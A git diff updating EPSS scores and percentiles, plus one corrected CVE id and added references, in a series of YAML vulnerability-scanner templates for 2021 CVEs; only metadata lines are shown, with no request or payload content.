f1b2b50e8c..2d973eba82 100644 --- a/http/cves/2021/CVE-2021-27670.yaml +++ b/http/cves/2021/CVE-2021-27670.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-27670 cwe-id: CWE-918 - epss-score: 0.42031 - epss-percentile: 0.96956 + epss-score: 0.43531 + epss-percentile: 0.97021 cpe: cpe:2.3:a:appspace:appspace:6.2.4:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-27850.yaml b/http/cves/2021/CVE-2021-27850.yaml index 1bf6fde0f3..e45309dbcd 100644 --- a/http/cves/2021/CVE-2021-27850.yaml +++ b/http/cves/2021/CVE-2021-27850.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-27850 cwe-id: CWE-502,CWE-200 - epss-score: 0.9739 - epss-percentile: 0.999 + epss-score: 0.97388 + epss-percentile: 0.99903 cpe: cpe:2.3:a:apache:tapestry:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-27905.yaml b/http/cves/2021/CVE-2021-27905.yaml index c439ef861d..16c97606b7 100644 --- a/http/cves/2021/CVE-2021-27905.yaml +++ b/http/cves/2021/CVE-2021-27905.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-27905 cwe-id: CWE-918 - epss-score: 0.94485 - epss-percentile: 0.99029 + epss-score: 0.93855 + epss-percentile: 0.98954 cpe: cpe:2.3:a:apache:solr:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-27909.yaml b/http/cves/2021/CVE-2021-27909.yaml index e23ef1650e..8a2ad0f20f 100644 --- a/http/cves/2021/CVE-2021-27909.yaml +++ b/http/cves/2021/CVE-2021-27909.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-27909 cwe-id: CWE-79 epss-score: 0.00094 - epss-percentile: 0.39181 + epss-percentile: 0.3924 cpe: cpe:2.3:a:acquia:mautic:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-27931.yaml b/http/cves/2021/CVE-2021-27931.yaml index a49d8b642b..a66f268c84 100644 --- a/http/cves/2021/CVE-2021-27931.yaml +++ b/http/cves/2021/CVE-2021-27931.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.1 cve-id: CVE-2021-27931 cwe-id: CWE-611 - epss-score: 0.50656 - epss-percentile: 0.97231 + epss-score: 0.4974 + epss-percentile: 0.97222 cpe: cpe:2.3:a:lumis:lumis_experience_platform:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-28149.yaml b/http/cves/2021/CVE-2021-28149.yaml index c48337bd2e..fedf21b1a5 100644 --- a/http/cves/2021/CVE-2021-28149.yaml +++ b/http/cves/2021/CVE-2021-28149.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.5 cve-id: CVE-2021-28149 cwe-id: CWE-22 - epss-score: 0.06892 - epss-percentile: 0.93193 + epss-score: 0.05499 + epss-percentile: 0.92458 cpe: cpe:2.3:o:hongdian:h8922_firmware:3.0.5:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-28150.yaml b/http/cves/2021/CVE-2021-28150.yaml index fe1e46e957..aec1b6ea74 100644 --- a/http/cves/2021/CVE-2021-28150.yaml +++ b/http/cves/2021/CVE-2021-28150.yaml @@ -18,8 +18,8 @@ info: cvss-score: 5.5 cve-id: CVE-2021-28150 cwe-id: CWE-425 - epss-score: 0.00339 - epss-percentile: 0.68183 + epss-score: 0.00253 + epss-percentile: 0.63106 cpe: cpe:2.3:o:hongdian:h8922_firmware:3.0.5:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-28151.yaml b/http/cves/2021/CVE-2021-28151.yaml index 55540a1df3..34dcc6ee74 100644 --- a/http/cves/2021/CVE-2021-28151.yaml +++ b/http/cves/2021/CVE-2021-28151.yaml @@ -19,8 +19,8 @@ info: cvss-score: 8.8 cve-id: CVE-2021-28151 cwe-id: CWE-78 - epss-score: 0.97051 - epss-percentile: 0.99698 + epss-score: 0.96989 + epss-percentile: 0.99682 cpe: cpe:2.3:o:hongdian:h8922_firmware:3.0.5:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-28169.yaml b/http/cves/2021/CVE-2021-28169.yaml index 0d02c8fcd4..46a6fc6d35 100644 --- a/http/cves/2021/CVE-2021-28169.yaml +++ b/http/cves/2021/CVE-2021-28169.yaml @@ -21,8 +21,8 @@ info: cvss-score: 5.3 cve-id: CVE-2021-28169 cwe-id: CWE-200,NVD-CWE-Other - epss-score: 0.00304 - epss-percentile: 0.66314 + epss-score: 0.00401 + epss-percentile: 0.70865 cpe: cpe:2.3:a:eclipse:jetty:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-28377.yaml b/http/cves/2021/CVE-2021-28377.yaml index 9f55baae4e..f9a68e2a96 100644 --- a/http/cves/2021/CVE-2021-28377.yaml +++ b/http/cves/2021/CVE-2021-28377.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-28377 cwe-id: CWE-22 epss-score: 0.00106 - epss-percentile: 0.42771 + epss-percentile: 0.42853 cpe: cpe:2.3:a:chronoengine:chronoforums:2.0.11:*:*:*:*:joomla:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-28419.yaml b/http/cves/2021/CVE-2021-28419.yaml index f72cadac7c..ba5ea14928 100644 --- a/http/cves/2021/CVE-2021-28419.yaml +++ b/http/cves/2021/CVE-2021-28419.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-28419 cwe-id: CWE-89 epss-score: 0.17236 - epss-percentile: 0.95579 + epss-percentile: 0.95619 cpe: cpe:2.3:a:seopanel:seo_panel:4.8.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-28918.yaml b/http/cves/2021/CVE-2021-28918.yaml index 6126824d75..d3bdc4d29f 100644 --- a/http/cves/2021/CVE-2021-28918.yaml +++ b/http/cves/2021/CVE-2021-28918.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.1 cve-id: CVE-2021-28918 cwe-id: CWE-704 - epss-score: 0.02368 - epss-percentile: 0.88658 + epss-score: 0.02704 + epss-percentile: 0.89404 cpe: cpe:2.3:a:netmask_project:netmask:*:*:*:*:*:node.js:*:* metadata: max-request: 3 diff --git a/http/cves/2021/CVE-2021-28937.yaml b/http/cves/2021/CVE-2021-28937.yaml index 51b9d11ea8..b0235c755a 100644 --- a/http/cves/2021/CVE-2021-28937.yaml +++ b/http/cves/2021/CVE-2021-28937.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-28937 cwe-id: CWE-312 - epss-score: 0.03534 - epss-percentile: 0.90571 + epss-score: 0.02476 + epss-percentile: 0.88958 cpe: cpe:2.3:o:acexy:wireless-n_wifi_repeater_firmware:28.08.06.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-29006.yaml b/http/cves/2021/CVE-2021-29006.yaml index a1089dbd75..124a76f685 100644 --- a/http/cves/2021/CVE-2021-29006.yaml +++ b/http/cves/2021/CVE-2021-29006.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2021-29006 cwe-id: CWE-22 epss-score: 0.09465 - epss-percentile: 0.94135 + epss-percentile: 0.94172 cpe: cpe:2.3:a:rconfig:rconfig:3.9.6:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-29156.yaml b/http/cves/2021/CVE-2021-29156.yaml index e45540813c..8e1689d697 100644 --- a/http/cves/2021/CVE-2021-29156.yaml +++ b/http/cves/2021/CVE-2021-29156.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-29156 cwe-id: CWE-74 epss-score: 0.35978 - epss-percentile: 0.9675 + epss-percentile: 0.96775 cpe: cpe:2.3:a:forgerock:openam:*:*:*:*:*:*:*:* metadata: max-request: 3 diff --git a/http/cves/2021/CVE-2021-29200.yaml b/http/cves/2021/CVE-2021-29200.yaml index e11d376ac5..754e3456df 100644 --- a/http/cves/2021/CVE-2021-29200.yaml +++ b/http/cves/2021/CVE-2021-29200.yaml @@ -10,13 +10,15 @@ info: - http://www.openwall.com/lists/oss-security/2021/04/27/4 - https://nvd.nist.gov/vuln/detail/CVE-2021-29200 - https://github.com/freeide/CVE-2021-29200 + - https://lists.apache.org/thread.html/r108a964764b8bd21ebd32ccd4f51c183ee80a251c105b849154a8e9d%40%3Ccommits.ofbiz.apache.org%3E + - https://lists.apache.org/thread.html/r708351f1a8af7adb887cc3d8a92bed8fcbff4a9e495e69a9ee546fda%40%3Cnotifications.ofbiz.apache.org%3E classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 - cve-id: CVE-2023-49070 + cve-id: CVE-2021-29200 cwe-id: CWE-502 - epss-score: 0.28884 - epss-percentile: 0.96427 + epss-score: 0.90403 + epss-percentile: 0.98567 cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-29203.yaml b/http/cves/2021/CVE-2021-29203.yaml index 13403bdfb3..be5aaaf161 100644 --- a/http/cves/2021/CVE-2021-29203.yaml +++ b/http/cves/2021/CVE-2021-29203.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-29203 cwe-id: CWE-306 epss-score: 0.95733 - epss-percentile: 0.9927 + epss-percentile: 0.9929 cpe: cpe:2.3:a:hp:edgeline_infrastructure_manager:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-29441.yaml b/http/cves/2021/CVE-2021-29441.yaml index 6f716582d3..233484ebf9 100644 --- a/http/cves/2021/CVE-2021-29441.yaml +++ b/http/cves/2021/CVE-2021-29441.yaml @@ -26,8 +26,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-29441 cwe-id: CWE-290 - epss-score: 0.96761 - epss-percentile: 0.99587 + epss-score: 0.96709 + epss-percentile: 0.99574 cpe: cpe:2.3:a:alibaba:nacos:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-29442.yaml b/http/cves/2021/CVE-2021-29442.yaml index f14f9d1edf..676a371679 100644 --- a/http/cves/2021/CVE-2021-29442.yaml +++ b/http/cves/2021/CVE-2021-29442.yaml @@ -21,8 +21,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-29442 cwe-id: CWE-306 - epss-score: 0.96866 - epss-percentile: 0.99627 + epss-score: 0.9676 + epss-percentile: 0.99596 cpe: cpe:2.3:a:alibaba:nacos:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-29484.yaml b/http/cves/2021/CVE-2021-29484.yaml index 711f4ef84f..086ba5e5d3 100644 --- a/http/cves/2021/CVE-2021-29484.yaml +++ b/http/cves/2021/CVE-2021-29484.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.8 cve-id: CVE-2021-29484 cwe-id: CWE-79 - epss-score: 0.01107 - epss-percentile: 0.82803 + epss-score: 0.01008 + epss-percentile: 0.82004 cpe: cpe:2.3:a:ghost:ghost:*:*:*:*:*:node.js:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-29490.yaml b/http/cves/2021/CVE-2021-29490.yaml index c73dcdc690..713e6cc225 100644 --- a/http/cves/2021/CVE-2021-29490.yaml +++ b/http/cves/2021/CVE-2021-29490.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-29490 cwe-id: CWE-918 epss-score: 0.00139 - epss-percentile: 0.49288 + epss-percentile: 0.49387 cpe: cpe:2.3:a:jellyfin:jellyfin:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-29505.yaml b/http/cves/2021/CVE-2021-29505.yaml index ac2146db3b..0b28147cc6 100644 --- a/http/cves/2021/CVE-2021-29505.yaml +++ b/http/cves/2021/CVE-2021-29505.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-29505 cwe-id: CWE-502 epss-score: 0.03355 - epss-percentile: 0.90358 + epss-percentile: 0.90418 cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-29622.yaml b/http/cves/2021/CVE-2021-29622.yaml index f7b5a2fc1d..4dd83a53ad 100644 --- a/http/cves/2021/CVE-2021-29622.yaml +++ b/http/cves/2021/CVE-2021-29622.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.1 cve-id: CVE-2021-29622 cwe-id: CWE-601 - epss-score: 0.00206 - epss-percentile: 0.58315 + epss-score: 0.00269 + epss-percentile: 0.64358 cpe: cpe:2.3:a:prometheus:prometheus:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-29625.yaml b/http/cves/2021/CVE-2021-29625.yaml index 84d12d8b23..bc4fd90089 100644 --- a/http/cves/2021/CVE-2021-29625.yaml +++ b/http/cves/2021/CVE-2021-29625.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.1 cve-id: CVE-2021-29625 cwe-id: CWE-79 - epss-score: 0.00212 - epss-percentile: 0.58975 + epss-score: 0.00222 + epss-percentile: 0.60478 cpe: cpe:2.3:a:adminer:adminer:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-3002.yaml b/http/cves/2021/CVE-2021-3002.yaml index 651fe6842c..6a41841879 100644 --- a/http/cves/2021/CVE-2021-3002.yaml +++ b/http/cves/2021/CVE-2021-3002.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-3002 cwe-id: CWE-79 epss-score: 0.00143 - epss-percentile: 0.4998 + epss-percentile: 0.50085 cpe: cpe:2.3:a:seopanel:seo_panel:4.8.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-30049.yaml b/http/cves/2021/CVE-2021-30049.yaml index 2a1238a4e5..911c0d08ee 100644 --- a/http/cves/2021/CVE-2021-30049.yaml +++ b/http/cves/2021/CVE-2021-30049.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-30049 cwe-id: CWE-79 epss-score: 0.00102 - epss-percentile: 0.41104 + epss-percentile: 0.4118 cpe: cpe:2.3:a:sysaid:sysaid:20.3.64:b14:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-30128.yaml b/http/cves/2021/CVE-2021-30128.yaml index 8033eb54c0..68a710ecec 100644 --- a/http/cves/2021/CVE-2021-30128.yaml +++ b/http/cves/2021/CVE-2021-30128.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-30128 cwe-id: CWE-502 - epss-score: 0.6531 - epss-percentile: 0.97582 + epss-score: 0.65128 + epss-percentile: 0.97606 cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-30134.yaml b/http/cves/2021/CVE-2021-30134.yaml index 66c52c1920..c3fbfca8fe 100644 --- a/http/cves/2021/CVE-2021-30134.yaml +++ b/http/cves/2021/CVE-2021-30134.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.1 cve-id: CVE-2021-30134 cwe-id: CWE-79 - epss-score: 0.00078 - epss-percentile: 0.32706 + epss-score: 0.00097 + epss-percentile: 0.40139 cpe: cpe:2.3:a:php_curl_class_project:php_curl_class:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-30151.yaml b/http/cves/2021/CVE-2021-30151.yaml index e4e982ff8d..de8f5e1b79 100644 --- a/http/cves/2021/CVE-2021-30151.yaml +++ b/http/cves/2021/CVE-2021-30151.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.1 cve-id: CVE-2021-30151 cwe-id: CWE-79 - epss-score: 0.00455 - epss-percentile: 0.72421 + epss-score: 0.00404 + epss-percentile: 0.7096 cpe: cpe:2.3:a:contribsys:sidekiq:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-3017.yaml b/http/cves/2021/CVE-2021-3017.yaml index 79f59fd4bd..f95d120b45 100644 --- a/http/cves/2021/CVE-2021-3017.yaml +++ b/http/cves/2021/CVE-2021-3017.yaml @@ -16,8 +16,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2021-3017 - epss-score: 0.01344 - epss-percentile: 0.84555 + epss-score: 0.01527 + epss-percentile: 0.85659 cpe: cpe:2.3:o:intelbras:win_300_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-30175.yaml b/http/cves/2021/CVE-2021-30175.yaml index c8dd814852..18a753951f 100644 --- a/http/cves/2021/CVE-2021-30175.yaml +++ b/http/cves/2021/CVE-2021-30175.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-30175 cwe-id: CWE-89 epss-score: 0.03658 - epss-percentile: 0.90717 + epss-percentile: 0.90791 cpe: cpe:2.3:a:zerof:web_server:1.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-3019.yaml b/http/cves/2021/CVE-2021-3019.yaml index 03efdbf633..9f3b8bdbec 100644 --- a/http/cves/2021/CVE-2021-3019.yaml +++ b/http/cves/2021/CVE-2021-3019.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-3019 cwe-id: CWE-22 epss-score: 0.00974 - epss-percentile: 0.81596 + epss-percentile: 0.8168 cpe: cpe:2.3:a:lanproxy_project:lanproxy:0.1:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-30213.yaml b/http/cves/2021/CVE-2021-30213.yaml index 11f2357272..473e4d2473 100644 --- a/http/cves/2021/CVE-2021-30213.yaml +++ b/http/cves/2021/CVE-2021-30213.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-30213 cwe-id: CWE-79 epss-score: 0.001 - epss-percentile: 0.40711 + epss-percentile: 0.4078 cpe: cpe:2.3:a:eng:knowage:7.3.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-30461.yaml b/http/cves/2021/CVE-2021-30461.yaml index 79637b672c..1b50b009ca 100644 --- a/http/cves/2021/CVE-2021-30461.yaml +++ b/http/cves/2021/CVE-2021-30461.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-30461 cwe-id: CWE-94 - epss-score: 0.9658 - epss-percentile: 0.99516 + epss-score: 0.96262 + epss-percentile: 0.99416 cpe: cpe:2.3:a:voipmonitor:voipmonitor:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-30497.yaml b/http/cves/2021/CVE-2021-30497.yaml index e823d1d3b9..f613dded9f 100644 --- a/http/cves/2021/CVE-2021-30497.yaml +++ b/http/cves/2021/CVE-2021-30497.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-30497 cwe-id: CWE-22 epss-score: 0.96355 - epss-percentile: 0.9943 + epss-percentile: 0.99448 cpe: cpe:2.3:a:ivanti:avalanche:6.3.2:*:*:*:*:windows:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-3110.yaml b/http/cves/2021/CVE-2021-3110.yaml index 58ac34b268..16be4b6efe 100644 --- a/http/cves/2021/CVE-2021-3110.yaml +++ b/http/cves/2021/CVE-2021-3110.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-3110 cwe-id: CWE-89 - epss-score: 0.86817 - epss-percentile: 0.98308 + epss-score: 0.83896 + epss-percentile: 0.98189 cpe: cpe:2.3:a:prestashop:prestashop:1.7.7.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-31195.yaml b/http/cves/2021/CVE-2021-31195.yaml index b3ece52f13..10ed732ddf 100644 --- a/http/cves/2021/CVE-2021-31195.yaml +++ b/http/cves/2021/CVE-2021-31195.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.5 cve-id: CVE-2021-31195 cwe-id: CWE-79 - epss-score: 0.92365 - epss-percentile: 0.98742 + epss-score: 0.92344 + epss-percentile: 0.98768 cpe: cpe:2.3:a:microsoft:exchange_server:2013:cumulative_update_23:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-31249.yaml b/http/cves/2021/CVE-2021-31249.yaml index e2222896ad..47acf595d7 100644 --- a/http/cves/2021/CVE-2021-31249.yaml +++ b/http/cves/2021/CVE-2021-31249.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-31249 cwe-id: CWE-74 epss-score: 0.00331 - epss-percentile: 0.67883 + epss-percentile: 0.68046 cpe: cpe:2.3:o:chiyu-tech:bf-430_firmware:-:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-31250.yaml b/http/cves/2021/CVE-2021-31250.yaml index 6ae2efc722..0299dd8617 100644 --- a/http/cves/2021/CVE-2021-31250.yaml +++ b/http/cves/2021/CVE-2021-31250.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-31250 cwe-id: CWE-79 epss-score: 0.97079 - epss-percentile: 0.99713 + epss-percentile: 0.99724 cpe: cpe:2.3:o:chiyu-tech:bf-430_firmware:-:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-3129.yaml b/http/cves/2021/CVE-2021-3129.yaml index c36d14bfcc..2c83ca02ac 100644 --- a/http/cves/2021/CVE-2021-3129.yaml +++ b/http/cves/2021/CVE-2021-3129.yaml @@ -18,8 +18,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-3129 - epss-score: 0.97488 - epss-percentile: 0.9997 + epss-score: 0.97482 + epss-percentile: 0.99964 cpe: cpe:2.3:a:facade:ignition:*:*:*:*:*:laravel:*:* metadata: max-request: 6 diff --git a/http/cves/2021/CVE-2021-31537.yaml b/http/cves/2021/CVE-2021-31537.yaml index bea93f39fd..0cd9905780 100644 --- a/http/cves/2021/CVE-2021-31537.yaml +++ b/http/cves/2021/CVE-2021-31537.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.1 cve-id: CVE-2021-31537 cwe-id: CWE-79 - epss-score: 0.00271 - epss-percentile: 0.64272 + epss-score: 0.00328 + epss-percentile: 0.67835 cpe: cpe:2.3:a:sisinformatik:sis-rewe_go:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-31581.yaml b/http/cves/2021/CVE-2021-31581.yaml index bcffc08999..2473029849 100644 --- a/http/cves/2021/CVE-2021-31581.yaml +++ b/http/cves/2021/CVE-2021-31581.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-31581 cwe-id: CWE-312,CWE-269 epss-score: 0.00285 - epss-percentile: 0.65204 + epss-percentile: 0.65373 cpe: cpe:2.3:a:akkadianlabs:ova_appliance:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-31589.yaml b/http/cves/2021/CVE-2021-31589.yaml index a2f0244f3e..43b6b0f45f 100644 --- a/http/cves/2021/CVE-2021-31589.yaml +++ b/http/cves/2021/CVE-2021-31589.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-31589 cwe-id: CWE-79 epss-score: 0.00286 - epss-percentile: 0.6527 + epss-percentile: 0.65438 cpe: cpe:2.3:o:beyondtrust:appliance_base_software:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-31602.yaml b/http/cves/2021/CVE-2021-31602.yaml index 3a97cf4665..c7125df57c 100644 --- a/http/cves/2021/CVE-2021-31602.yaml +++ b/http/cves/2021/CVE-2021-31602.yaml @@ -20,8 +20,8 @@ info: cvss-score: 7.5 cve-id: CVE-2021-31602 cwe-id: CWE-287 - epss-score: 0.39689 - epss-percentile: 0.96891 + epss-score: 0.36115 + epss-percentile: 0.96779 cpe: cpe:2.3:a:hitachi:vantara_pentaho:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-31682.yaml b/http/cves/2021/CVE-2021-31682.yaml index 767d74446f..6a432d711e 100644 --- a/http/cves/2021/CVE-2021-31682.yaml +++ b/http/cves/2021/CVE-2021-31682.yaml @@ -19,8 +19,8 @@ info: cvss-score: 6.1 cve-id: CVE-2021-31682 cwe-id: CWE-79 - epss-score: 0.00534 - epss-percentile: 0.74521 + epss-score: 0.01071 + epss-percentile: 0.82601 cpe: cpe:2.3:a:automatedlogic:webctrl:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-31755.yaml b/http/cves/2021/CVE-2021-31755.yaml index fa6a7d1fa4..09892a2286 100644 --- a/http/cves/2021/CVE-2021-31755.yaml +++ b/http/cves/2021/CVE-2021-31755.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-31755 cwe-id: CWE-787 - epss-score: 0.96272 - epss-percentile: 0.99403 + epss-score: 0.95969 + epss-percentile: 0.9934 cpe: cpe:2.3:o:tenda:ac11_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-31805.yaml b/http/cves/2021/CVE-2021-31805.yaml index 961a9cee82..91fd695868 100644 --- a/http/cves/2021/CVE-2021-31805.yaml +++ b/http/cves/2021/CVE-2021-31805.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-31805 cwe-id: CWE-917 epss-score: 0.11237 - epss-percentile: 0.94627 + epss-percentile: 0.94657 cpe: cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-31856.yaml b/http/cves/2021/CVE-2021-31856.yaml index 6b47775a9f..87d52a1d43 100644 --- a/http/cves/2021/CVE-2021-31856.yaml +++ b/http/cves/2021/CVE-2021-31856.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-31856 cwe-id: CWE-89 - epss-score: 0.04953 - epss-percentile: 0.91957 + epss-score: 0.03993 + epss-percentile: 0.91153 cpe: cpe:2.3:a:layer5:meshery:0.5.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-31862.yaml b/http/cves/2021/CVE-2021-31862.yaml index def4f41a73..25ab68bf9e 100644 --- a/http/cves/2021/CVE-2021-31862.yaml +++ b/http/cves/2021/CVE-2021-31862.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-31862 cwe-id: CWE-79 epss-score: 0.00141 - epss-percentile: 0.49648 + epss-percentile: 0.49752 cpe: cpe:2.3:a:sysaid:sysaid:20.4.74:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-32030.yaml b/http/cves/2021/CVE-2021-32030.yaml index 3f0bf5ec92..22d7e732bb 100644 --- a/http/cves/2021/CVE-2021-32030.yaml +++ b/http/cves/2021/CVE-2021-32030.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-32030 cwe-id: CWE-287 - epss-score: 0.65428 - epss-percentile: 0.97584 + epss-score: 0.62 + epss-percentile: 0.97539 cpe: cpe:2.3:o:asus:gt-ac2900_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-32172.yaml b/http/cves/2021/CVE-2021-32172.yaml index c4f7cb7bb9..c4b22f6491 100644 --- a/http/cves/2021/CVE-2021-32172.yaml +++ b/http/cves/2021/CVE-2021-32172.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-32172 cwe-id: CWE-862 - epss-score: 0.26193 - epss-percentile: 0.96265 + epss-score: 0.26253 + epss-percentile: 0.96297 cpe: cpe:2.3:a:maianscriptworld:maian_cart:3.8:*:*:*:*:*:*:* metadata: max-request: 3 diff --git a/http/cves/2021/CVE-2021-3223.yaml b/http/cves/2021/CVE-2021-3223.yaml index 668bcd1fb4..b4cba18a70 100644 --- a/http/cves/2021/CVE-2021-3223.yaml +++ b/http/cves/2021/CVE-2021-3223.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-3223 cwe-id: CWE-22 epss-score: 0.11532 - epss-percentile: 0.94692 + epss-percentile: 0.9472 cpe: cpe:2.3:a:nodered:node-red-dashboard:*:*:*:*:*:node.js:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-32305.yaml b/http/cves/2021/CVE-2021-32305.yaml index 80754f6713..d84489c30c 100644 --- a/http/cves/2021/CVE-2021-32305.yaml +++ b/http/cves/2021/CVE-2021-32305.yaml @@ -19,8 +19,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-32305 cwe-id: CWE-78 - epss-score: 0.96769 - epss-percentile: 0.99592 + epss-score: 0.96624 + epss-percentile: 0.99546 cpe: cpe:2.3:a:websvn:websvn:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-32618.yaml b/http/cves/2021/CVE-2021-32618.yaml index 7899550a8e..9e6f88e879 100644 --- a/http/cves/2021/CVE-2021-32618.yaml +++ b/http/cves/2021/CVE-2021-32618.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.1 cve-id: CVE-2021-32618 cwe-id: CWE-601 - epss-score: 0.00104 - epss-percentile: 0.42118 + epss-score: 